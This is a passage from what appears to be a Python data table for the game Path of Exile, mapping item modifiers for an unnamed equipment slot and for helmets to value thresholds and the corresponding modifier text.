"# Life Regenerated per second": [(16.67, '(5.0 - 7.0) Life Regenerated per second'), (29.17, '(7.02 - 11.67) Life Regenerated per second'), (41.67, '(11.68 - 18.33) Life Regenerated per second'), (50.0, '(18.35 - 26.67) Life Regenerated per second'), (54.17, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second'), (58.33, '(26.68 - 40.0) Life Regenerated per second\n(0.8 - 0.93)% of Life Regenerated per second'), (83.33, '(26.68 - 40.0) Life Regenerated per second\n1.0% of Life Regenerated per second')],
"#% additional Physical Damage Reduction while Focussed": [(30, '(-15 - -11) Physical Damage taken from Attacks'), (50, '(-20 - -16) Physical Damage taken from Attacks')],
"#% chance to Avoid Elemental Ailments": [(30, '(15 - 20)% reduced Elemental Ailment Duration on you'), (60, '(21 - 35)% reduced Elemental Ailment Duration on you'), (200, '(36 - 50)% reduced Elemental Ailment Duration on you\n(16 - 25)% chance to Avoid Elemental Ailments')],
"#% chance to Avoid being Stunned": [(40, '(10 - 11)% chance to Avoid being Stunned'), (80, '(12 - 13)% chance to Avoid being Stunned'), (200, '(14 - 15)% chance to Avoid being Stunned')],
"#% increased Armour": [(100, '(15 - 18)% increased Armour'), (175, '(19 - 22)% increased Armour'), (250, '(23 - 26)% increased Armour'), (325, '(27 - 30)% increased Armour'), (400, '(30 - 35)% increased Armour'), (1000, '(4 - 5)% Chance to Block Attack Damage\n2% Chance to Block Spell Damage')],
"#% increased Armour and Energy Shield": [(100, '(15 - 18)% increased Armour\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Armour\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Armour\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Armour\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Armour\n(23 - 25)% increased Energy Shield'), (1000, '(4 - 5)% Chance to Block Attack Damage\n2% Chance to Block Spell Damage\nVitality has 10% reduced Mana Reservation\nDetermination has 10% reduced Mana Reservation\nGrace has 10% reduced Mana Reservation\nDiscipline has 10% reduced Mana Reservation\nPurity of Fire has 10% reduced Mana Reservation\nPurity of Ice has 10% reduced Mana Reservation\nPurity of Lightning has 10% reduced Mana Reservation')],
"#% increased Armour and Evasion": [(100, '(15 - 18)% increased Armour\n(15 - 18)% increased Evasion Rating'), (175, '(19 - 22)% increased Armour\n(19 - 22)% increased Evasion Rating'), (250, '(23 - 26)% increased Armour\n(23 - 26)% increased Evasion Rating'), (325, '(27 - 30)% increased Armour\n(27 - 30)% increased Evasion Rating'), (400, '(30 - 35)% increased Armour\n(30 - 35)% increased Evasion Rating'), (1000, '(4 - 5)% Chance to Block Attack Damage\n2% Chance to Block Spell Damage\n2% chance to Dodge Attack Hits\n2% chance to Dodge Spell Hits')],
"#% increased Armour, Evasion and Energy Shield": [(100, '(15 - 18)% increased Armour\n(15 - 18)% increased Evasion Rating\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Armour\n(19 - 22)% increased Evasion Rating\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Armour\n(23 - 26)% increased Evasion Rating\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Armour\n(27 - 30)% increased Evasion Rating\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Armour\n(30 - 35)% increased Evasion Rating\n(23 - 25)% increased Energy Shield'), (1000, '(4 - 5)% Chance to Block Attack Damage\n2% Chance to Block Spell Damage\n2% chance to Dodge Attack Hits\n2% chance to Dodge Spell Hits\nVitality has 10% reduced Mana Reservation\nDetermination has 10% reduced Mana Reservation\nGrace has 10% reduced Mana Reservation\nDiscipline has 10% reduced Mana Reservation\nPurity of Fire has 10% reduced Mana Reservation\nPurity of Ice has 10% reduced Mana Reservation\nPurity of Lightning has 10% reduced Mana Reservation')],
"#% increased Attack Speed": [(30, '3% increased Attack Speed'), (45, '4% increased Attack Speed'), (100, '5% increased Attack Speed')],
"#% increased Attack and Cast Speed if you've Hit an Enemy Recently": [(11, '3% increased Attack and Cast Speed'), (22, '4% increased Attack and Cast Speed'), (50, '5% increased Attack and Cast Speed')],
"#% increased Attack and Cast Speed while Focussed": [(90, '3% increased Attack and Cast Speed'), (200, '4% increased Attack and Cast Speed')],
"#% increased Brand Attachment range": [(30, '(2 - 3)% increased Brand Attachment range'), (100, '(4 - 5)% increased Brand Attachment range')],
"#% increased Damage during any Flask Effect": [(70, '(10 - 12)% increased Damage during any Flask Effect'), (150, '(13 - 15)% increased Damage during any Flask Effect')],
"#% increased Damage while Leeching": [(100, '(10 - 12)% increased Damage while Leeching'), (200, '(13 - 15)% increased Damage while Leeching')],
"#% increased Elemental Damage if you've dealt a Critical Strike Recently": [(30, '(11 - 12)% increased Elemental Damage'), (60, '(13 - 14)% increased Elemental Damage'), (100, '(15 - 16)% increased Elemental Damage')],
"#% increased Energy Shield": [(100, '(15 - 16)% increased Energy Shield'), (175, '(17 - 18)% increased Energy Shield'), (250, '(19 - 20)% increased Energy Shield'), (325, '(21 - 22)% increased Energy Shield'), (400, '(23 - 25)% increased Energy Shield'), (1000, 'Vitality has 10% reduced Mana Reservation\nDetermination has 10% reduced Mana Reservation\nGrace has 10% reduced Mana Reservation\nDiscipline has 10% reduced Mana Reservation\nPurity of Fire has 10% reduced Mana Reservation\nPurity of Ice has 10% reduced Mana Reservation\nPurity of Lightning has 10% reduced Mana Reservation')],
"#% increased Evasion Rating": [(100, '(15 - 18)% increased Evasion Rating'), (175, '(19 - 22)% increased Evasion Rating'), (250, '(23 - 26)% increased Evasion Rating'), (325, '(27 - 30)% increased Evasion Rating'), (400, '(30 - 35)% increased Evasion Rating'), (1000, '2% chance to Dodge Attack Hits\n2% chance to Dodge Spell Hits')],
"#% increased Evasion and Energy Shield": [(100, '(15 - 18)% increased Evasion Rating\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Evasion Rating\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Evasion Rating\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Evasion Rating\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Evasion Rating\n(23 - 25)% increased Energy Shield'), (1000, '2% chance to Dodge Attack Hits\n2% chance to Dodge Spell Hits\nVitality has 10% reduced Mana Reservation\nDetermination has 10% reduced Mana Reservation\nGrace has 10% reduced Mana Reservation\nDiscipline has 10% reduced Mana Reservation\nPurity of Fire has 10% reduced Mana Reservation\nPurity of Ice has 10% reduced Mana Reservation\nPurity of Lightning has 10% reduced Mana Reservation')],
"#% increased Global Critical Strike Chance": [(30, '(14 - 15)% increased Global Critical Strike Chance'), (60, '(16 - 17)% increased Global Critical Strike Chance'), (100, '(18 - 20)% increased Global Critical Strike Chance')],
"#% increased Rarity of Items found": [(30, '(10 - 11)% increased Rarity of Items found'), (60, '(12 - 13)% increased Rarity of Items found'), (90, '(14 - 15)% increased Rarity of Items found'), (120, '(16 - 17)% increased Rarity of Items found'), (145, '(18 - 20)% increased Rarity of Items found'), (200, '(1 - 3)% increased Quantity of Items found')],
"#% increased Stun and Block Recovery": [(30, '(10 - 12)% increased Stun and Block Recovery'), (60, '(13 - 15)% increased Stun and Block Recovery'), (90, '(16 - 18)% increased Stun and Block Recovery'), (110, '(19 - 21)% increased Stun and Block Recovery'), (130, '(22 - 25)% increased Stun and Block Recovery'), (160, '(14 - 15)% chance to Avoid being Stunned')],
"#% increased Vaal Skill Critical Strike Chance": [(170, '(21 - 30)% increased Vaal Skill Critical Strike Chance'), (340, '(31 - 40)% increased Vaal Skill Critical Strike Chance'), (500, '(5 - 7)% increased Attack and Cast Speed if Corrupted')],
"#% of Life Regenerated per second": [(1.17, '(11.68 - 18.33) Life Regenerated per second'), (2.33, '(18.35 - 26.67) Life Regenerated per second'), (5.0, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '0.4% of Physical Attack Damage Leeched as Life\n10% increased Maximum total Recovery per second from Life Leech')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '0.3% of Physical Attack Damage Leeched as Mana\n10% increased Maximum total Recovery per second from Mana Leech')],
"#% of Physical Damage Converted to Cold Damage": [(35, '8% increased Cold Damage'), (72, '(9 - 10)% increased Cold Damage'), (100, '(11 - 12)% increased Cold Damage\n(7 - 10)% of Physical Damage Converted to Cold Damage')],
"#% of Physical Damage Converted to Fire Damage": [(35, '8% increased Fire Damage'), (72, '(9 - 10)% increased Fire Damage'), (100, '(11 - 12)% increased Fire Damage\n(7 - 10)% of Physical Damage Converted to Fire Damage')],
"#% of Physical Damage Converted to Lightning Damage": [(35, '8% increased Lightning Damage'), (72, '(9 - 10)% increased Lightning Damage'), (100, '(11 - 12)% increased Lightning Damage\n(7 - 10)% of Physical Damage Converted to Lightning Damage')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '(5 - 10)% chance to gain a Frenzy Charge on Kill')],
"#% reduced Elemental Ailment Duration on you": [(40, '(15 - 20)% reduced Elemental Ailment Duration on you'), (75, '(21 - 35)% reduced Elemental Ailment Duration on you'), (200, '(36 - 50)% reduced Elemental Ailment Duration on you')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (6, '(6 - 8) Life gained for each Enemy hit by your Attacks')],
"+# Life gained on Kill": [(15, '(6 - 8) Life gained on Kill'), (25, '(9 - 11) Life gained on Kill'), (35, '(12 - 15) Life gained on Kill'), (100, '(12 - 15) Life gained on Kill\nRecover (1 - 2)% of Maximum Life on Kill')],
"+# Mana gained for each Enemy hit by your Attacks": [(5, '2 Mana gained for each Enemy hit by your Attacks'), (10, '3 Mana gained for each Enemy hit by your Attacks'), (50, '4 Mana gained for each Enemy hit by your Attacks')],
"+# Mana gained on Kill": [(5, '3 Mana gained on Kill'), (10, '4 Mana gained on Kill'), (15, '5 Mana gained on Kill'), (50, '5 Mana gained on Kill\nRecover (1 - 2)% of Maximum Mana on Kill')],
"+# to Accuracy Rating": [(250, '(10 - 11)% increased Global Accuracy Rating'), (500, '(12 - 13)% increased Global Accuracy Rating'), (750, '(14 - 15)% increased Global Accuracy Rating'), (1000, '(16 - 17)% increased Global Accuracy Rating'), (1400, '(18 - 20)% increased Global Accuracy Rating'), (2000, '(18 - 20)% increased Global Accuracy Rating\n(150 - 250) to Accuracy Rating')],
"+# to Armour": [(40, '(15 - 20) to Armour'), (80, '(21 - 30) to Armour'), (110, '(31 - 40) to Armour'), (150, '(41 - 55) to Armour'), (200, '(56 - 70) to Armour'), (250, '(56 - 70) to Armour\n2% additional Physical Damage Reduction'), (1000, '(56 - 70) to Armour\n3% additional Physical Damage Reduction')],
"+# to Dexterity": [(40, '(6 - 8) to Dexterity'), (70, '(9 - 11) to Dexterity'), (100, '(12 - 14) to Dexterity'), (130, '(15 - 17) to Dexterity'), (160, '(18 - 20) to Dexterity'), (200, '(18 - 20) to Dexterity\n1 to Maximum Frenzy Charges')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating": [(35, '(15 - 20) to Evasion Rating'), (75, '(21 - 30) to Evasion Rating'), (105, '(31 - 40) to Evasion Rating'), (145, '(41 - 55) to Evasion Rating'), (195, '(56 - 70) to Evasion Rating'), (245, '(56 - 70) to Evasion Rating\n2 chance to Evade Attacks'), (1000, '(56 - 70) to Evasion Rating\n3 chance to Evade Attacks')],
"+# to Intelligence": [(40, '(6 - 8) to Intelligence'), (70, '(9 - 11) to Intelligence'), (100, '(12 - 14) to Intelligence'), (130, '(15 - 17) to Intelligence'), (160, '(18 - 20) to Intelligence'), (200, '(18 - 20) to Intelligence\n5% increased Intelligence')],
"+# to Level of Socketed AoE Gems": [(2, '(2 - 3) to Quality of Socketed AoE Gems'), (5, '(4 - 6) to Quality of Socketed AoE Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Melee Gems": [(2, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems')],
"+# to Level of Socketed Projectile Gems": [(2, '(2 - 3) to Quality of Socketed Projectile Gems'), (5, '(4 - 6) to Quality of Socketed Projectile Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, '(18 - 20) to Strength\n5% increased Strength')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to maximum Energy Shield": [(50, '(8 - 10) to maximum Energy Shield'), (75, '(11 - 14) to maximum Energy Shield'), (100, '(15 - 18) to maximum Energy Shield'), (125, '(19 - 23) to maximum Energy Shield'), (150, '(24 - 30) to maximum Energy Shield'), (175, '(24 - 30) to maximum Energy Shield\n(0.6 - 0.7)% of Energy Shield Regenerated per second'), (500, '(24 - 30) to maximum Energy Shield\n(0.8 - 0.9)% of Energy Shield Regenerated per second')],
"+# to maximum Life": [(100, '(8 - 10) to maximum Life'), (175, '(11 - 14) to maximum Life'), (250, '(15 - 19) to maximum Life'), (325, '(20 - 24) to maximum Life'), (400, '(25 - 30) to maximum Life\n4% increased maximum Life'), (1000, '(5 - 6)% increased maximum Life')],
"+# to maximum Mana": [(70, '(8 - 10) to maximum Mana'), (125, '(11 - 14) to maximum Mana'), (175, '(15 - 19) to maximum Mana'), (230, '(20 - 24) to maximum Mana'), (280, '(25 - 30) to maximum Mana\n6% increased maximum Mana'), (335, '(7 - 8)% increased maximum Mana'), (500, '(9 - 10)% increased maximum Mana')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (100, '(9 - 10) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance\n1 to maximum Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (140, '(15 - 16) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance\n1 to maximum Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (140, '(15 - 16) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance\n1 to maximum Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (140, '(15 - 16) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance\n1 to maximum Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"Adds # to # Chaos Damage": [(40, '(11 - 12)% increased Chaos Damage'), (80, '(13 - 14)% increased Chaos Damage'), (200, '(15 - 16)% increased Chaos Damage')],
"Adds # to # Chaos Damage to Attacks": [(25, '8% increased Chaos Damage'), (45, '(9 - 10)% increased Chaos Damage'), (100, '(11 - 12)% increased Chaos Damage')],
"Adds # to # Cold Damage": [(45, '(11 - 12)% increased Cold Damage'), (90, '(13 - 14)% increased Cold Damage'), (200, '(15 - 16)% increased Cold Damage')],
"Adds # to # Cold Damage to Attacks": [(15, '8% increased Cold Damage'), (22, '(9 - 10)% increased Cold Damage'), (33, '(11 - 12)% increased Cold Damage'), (42, '(13 - 14)% increased Cold Damage'), (100, '(15 - 16)% increased Cold Damage\n(15 - 25)% of Physical Damage Converted to Cold Damage\nCurse Enemies with Level 8 Frostbite on Hit')],
"Adds # to # Fire Damage": [(45, '(11 - 12)% increased Fire Damage'), (90, '(13 - 14)% increased Fire Damage'), (200, '(15 - 16)% increased Fire Damage')],
"Adds # to # Fire Damage to Attacks": [(15, '8% increased Fire Damage'), (25, '(9 - 10)% increased Fire Damage'), (35, '(11 - 12)% increased Fire Damage'), (45, '(13 - 14)% increased Fire Damage'), (100, '(15 - 16)% increased Fire Damage\n(15 - 25)% of Physical Damage Converted to Fire Damage\nCurse Enemies with Level 8 Flammability on Hit')],
"Adds # to # Lightning Damage": [(100, '(11 - 12)% increased Lightning Damage'), (160, '(13 - 14)% increased Lightning Damage'), (200, '(15 - 16)% increased Lightning Damage')],
"Adds # to # Lightning Damage to Attacks": [(30, '8% increased Lightning Damage'), (45, '(9 - 10)% increased Lightning Damage'), (60, '(11 - 12)% increased Lightning Damage'), (75, '(13 - 14)% increased Lightning Damage'), (100, '(15 - 16)% increased Lightning Damage\n(15 - 25)% of Physical Damage Converted to Lightning Damage\nCurse Enemies with Level 8 Conductivity on Hit')],
"Adds # to # Physical Damage": [(20, '(11 - 12)% increased Global Physical Damage'), (30, '(13 - 14)% increased Global Physical Damage'), (200, '(15 - 16)% increased Global Physical Damage')],
"Adds # to # Physical Damage against Bleeding Enemies": [(25, '(10 - 11)% increased Damage with Bleeding'), (45, '(12 - 13)% increased Damage with Bleeding'), (100, '(14 - 15)% increased Damage with Bleeding\n(8 - 12)% increased Bleeding Duration')],
"Adds # to # Physical Damage against Poisoned Enemies": [(25, '(10 - 11)% increased Damage with Poison'), (45, '(12 - 13)% increased Damage with Poison'), (100, '(14 - 15)% increased Damage with Poison\n(8 - 12)% increased Poison Duration')],
"Adds # to # Physical Damage to Attacks": [(8, '8% increased Global Physical Damage'), (16, '(9 - 10)% increased Global Physical Damage'), (24, '(11 - 12)% increased Global Physical Damage'), (28, '(13 - 14)% increased Global Physical Damage'), (50, '(15 - 16)% increased Global Physical Damage\n(6 - 10)% chance to Impale Enemies on Hit with Attacks\nCurse Enemies with Level 8 Vulnerability on Hit')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Minions Recover #% of their Life when you Focus": [(250, 'Minions Regenerate 0.3% Life per second'), (500, 'Minions Regenerate 0.5% Life per second')],
"Minions deal #% increased Damage": [(35, 'Minions deal (9 - 10)% increased Damage'), (100, 'Minions deal (11 - 12)% increased Damage')],
"Minions have #% increased maximum Life": [(40, 'Minions have (7 - 9)% increased maximum Life'), (80, 'Minions have (10 - 12)% increased maximum Life'), (150, 'Minions have (13 - 15)% increased maximum Life')],
"Non-Vaal Skills deal #% increased Damage during Soul Gain Prevention": [(150, 'Vaal Skills deal (13 - 16)% increased Damage'), (500, 'Vaal Skills deal (17 - 21)% increased Damage')],
"Socketed Gems deal # to # additional Fire Damage": [(230, '(11 - 12)% increased Fire Damage'), (460, '(13 - 14)% increased Fire Damage'), (1000, '(15 - 16)% increased Fire Damage')],
"Socketed Gems deal #% more Damage over Time": [(40, '(9 - 10)% increased Damage over Time'), (70, '(11 - 12)% increased Damage over Time'), (100, '(13 - 15)% increased Damage over Time')],
"Socketed Gems have #% more Attack and Cast Speed": [(17, '3% increased Attack and Cast Speed'), (33, '4% increased Attack and Cast Speed'), (100, '5% increased Attack and Cast Speed')],
"Socketed Gems have +3.5% Critical Strike Chance": [(360, '(14 - 15)% increased Global Critical Strike Chance'), (710, '(16 - 17)% increased Global Critical Strike Chance'), (1500, '(18 - 20)% increased Global Critical Strike Chance')],
"Socketed Skills have #% increased Attack Speed": [(20, '3% increased Attack Speed'), (40, '4% increased Attack Speed'), (100, '5% increased Attack Speed')],
"Socketed Skills have #% increased Cast Speed": [(20, '3% increased Cast Speed'), (40, '4% increased Cast Speed'), (100, '5% increased Cast Speed')],
"You have Onslaught during Soul Gain Prevention": [(2, '3% increased Attack Speed\n3% increased Cast Speed'), (5, '4% increased Attack Speed\n4% increased Cast Speed')],
},
"Helmet": {
"# Life Regenerated per second": [(16.67, '(5.0 - 7.0) Life Regenerated per second'), (29.17, '(7.02 - 11.67) Life Regenerated per second'), (41.67, '(11.68 - 18.33) Life Regenerated per second'), (50.0, '(18.35 - 26.67) Life Regenerated per second'), (54.17, '(26.68 - 40.0) Life Regenerated per second\n(0.6 - 0.7)% of Life Regenerated per second'), (58.33, '(26.68 - 40.0) Life Regenerated per second\n(0.8 - 0.93)% of Life Regenerated per second'), (83.33, '(26.68 - 40.0) Life Regenerated per second\n1.0% of Life Regenerated per second')],
"#% additional Physical Damage Reduction while Focussed": [(30, '(-15 - -11) Physical Damage taken from Attacks'), (50, '(-20 - -16) Physical Damage taken from Attacks')],
"#% chance to Avoid Elemental Ailments": [(30, '(15 - 20)% reduced Elemental Ailment Duration on you'), (60, '(21 - 35)% reduced Elemental Ailment Duration on you'), (200, '(36 - 50)% reduced Elemental Ailment Duration on you\n(16 - 25)% chance to Avoid Elemental Ailments')],
"#% chance to Avoid being Frozen": [(50, '(13 - 14)% chance to Avoid being Frozen'), (110, '(15 - 17)% chance to Avoid being Frozen'), (200, '(18 - 20)% chance to Avoid being Frozen')],
"#% chance to Avoid being Ignited": [(45, '(13 - 14)% chance to Avoid being Ignited'), (90, '(15 - 17)% chance to Avoid being Ignited'), (200, '(18 - 20)% chance to Avoid being Ignited')],
"#% chance to Avoid being Poisoned": [(55, '(14 - 16)% chance to Avoid being Poisoned'), (110, '(18 - 21)% chance to Avoid being Poisoned'), (200, '(22 - 25)% chance to Avoid being Poisoned')],
"#% chance to Avoid being Shocked": [(50, '(13 - 14)% chance to Avoid being Shocked'), (110, '(15 - 17)% chance to Avoid being Shocked'), (200, '(18 - 20)% chance to Avoid being Shocked')],
"#% chance to Avoid being Stunned": [(40, '(10 - 11)% chance to Avoid being Stunned'), (80, '(12 - 13)% chance to Avoid being Stunned'), (200, '(14 - 15)% chance to Avoid being Stunned')],
"#% chance to Trigger Socketed Spells when you Focus": [(210, 'Triggered Spells deal (10 - 12)% increased Spell Damage'), (300, 'Triggered Spells deal (13 - 15)% increased Spell Damage')],
"#% chance to avoid Bleeding": [(55, '(14 - 16)% chance to avoid Bleeding'), (110, '(18 - 21)% chance to avoid Bleeding'), (200, '(22 - 25)% chance to avoid Bleeding')],
"#% chance to gain an additional Vaal Soul on Kill": [(11, '(2 - 3)% chance to gain an additional Vaal Soul on Kill'), (22, '(4 - 5)% chance to gain an additional Vaal Soul on Kill'), (50, '(8 - 12) to all Elemental Resistances if Corrupted')],
"#% increased Armour": [(100, '(15 - 18)% increased Armour'), (175, '(19 - 22)% increased Armour'), (250, '(23 - 26)% increased Armour'), (325, '(27 - 30)% increased Armour'), (400, '(30 - 35)% increased Armour'), (1000, '2% Chance to Block Attack Damage\n(4 - 5)% Chance to Block Spell Damage')],
"#% increased Armour and Energy Shield": [(100, '(15 - 18)% increased Armour\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Armour\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Armour\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Armour\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Armour\n(23 - 25)% increased Energy Shield'), (1000, '2% Chance to Block Attack Damage\n(4 - 5)% Chance to Block Spell Damage\n(10 - 15)% increased Effect of Auras on you')],
"#% increased Armour and Evasion": [(100, '(15 - 18)% increased Armour\n(15 - 18)% increased Evasion Rating'), (175, '(19 - 22)% increased Armour\n(19 - 22)% increased Evasion Rating'), (250, '(23 - 26)% increased Armour\n(23 - 26)% increased Evasion Rating'), (325, '(27 - 30)% increased Armour\n(27 - 30)% increased Evasion Rating'), (400, '(30 - 35)% increased Armour\n(30 - 35)% increased Evasion Rating'), (1000, '2% Chance to Block Attack Damage\n(4 - 5)% Chance to Block Spell Damage\n2% chance to Dodge Attack Hits\n2% chance to Dodge Spell Hits')],
"#% increased Armour, Evasion and Energy Shield": [(100, '(15 - 18)% increased Armour\n(15 - 18)% increased Evasion Rating\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Armour\n(19 - 22)% increased Evasion Rating\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Armour\n(23 - 26)% increased Evasion Rating\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Armour\n(27 - 30)% increased Evasion Rating\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Armour\n(30 - 35)% increased Evasion Rating\n(23 - 25)% increased Energy Shield'), (1000, '2% Chance to Block Attack Damage\n(4 - 5)% Chance to Block Spell Damage\n2% chance to Dodge Attack Hits\n2% chance to Dodge Spell Hits\n(10 - 15)% increased Effect of Auras on you')],
"#% increased Duration of Ailments you inflict while Focussed": [(250, '(8 - 10)% increased Ignite Duration on Enemies\n(8 - 10)% increased Freeze Duration on Enemies\n(8 - 10)% increased Shock Duration on Enemies'), (500, '(12 - 15)% increased Ignite Duration on Enemies\n(12 - 15)% increased Freeze Duration on Enemies\n(12 - 15)% increased Shock Duration on Enemies')],
"#% increased Energy Shield": [(100, '(15 - 16)% increased Energy Shield'), (175, '(17 - 18)% increased Energy Shield'), (250, '(19 - 20)% increased Energy Shield'), (325, '(21 - 22)% increased Energy Shield'), (400, '(23 - 25)% increased Energy Shield'), (1000, '(10 - 15)% increased Effect of Auras on you')],
"#% increased Evasion Rating": [(100, '(15 - 18)% increased Evasion Rating'), (175, '(19 - 22)% increased Evasion Rating'), (250, '(23 - 26)% increased Evasion Rating'), (325, '(27 - 30)% increased Evasion Rating'), (400, '(30 - 35)% increased Evasion Rating'), (1000, '2% chance to Dodge Attack Hits\n2% chance to Dodge Spell Hits')],
"#% increased Evasion and Energy Shield": [(100, '(15 - 18)% increased Evasion Rating\n(15 - 16)% increased Energy Shield'), (175, '(19 - 22)% increased Evasion Rating\n(17 - 18)% increased Energy Shield'), (250, '(23 - 26)% increased Evasion Rating\n(19 - 20)% increased Energy Shield'), (325, '(27 - 30)% increased Evasion Rating\n(21 - 22)% increased Energy Shield'), (400, '(30 - 35)% increased Evasion Rating\n(23 - 25)% increased Energy Shield'), (1000, '2% chance to Dodge Attack Hits\n2% chance to Dodge Spell Hits\n(10 - 15)% increased Effect of Auras on you')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\n1 to Level of Socketed Gems')],
"#% increased Mine Laying Speed": [(30, '(2 - 3)% increased Mine Laying Speed'), (100, '(4 - 5)% increased Mine Laying Speed')],
"#% increased Rarity of Items Dropped by Slain Rare or Unique Enemies": [(60, '(10 - 11)% increased Rarity of Items found'), (120, '(12 - 13)% increased Rarity of Items found'), (200, '(14 - 15)% increased Rarity of Items found')],
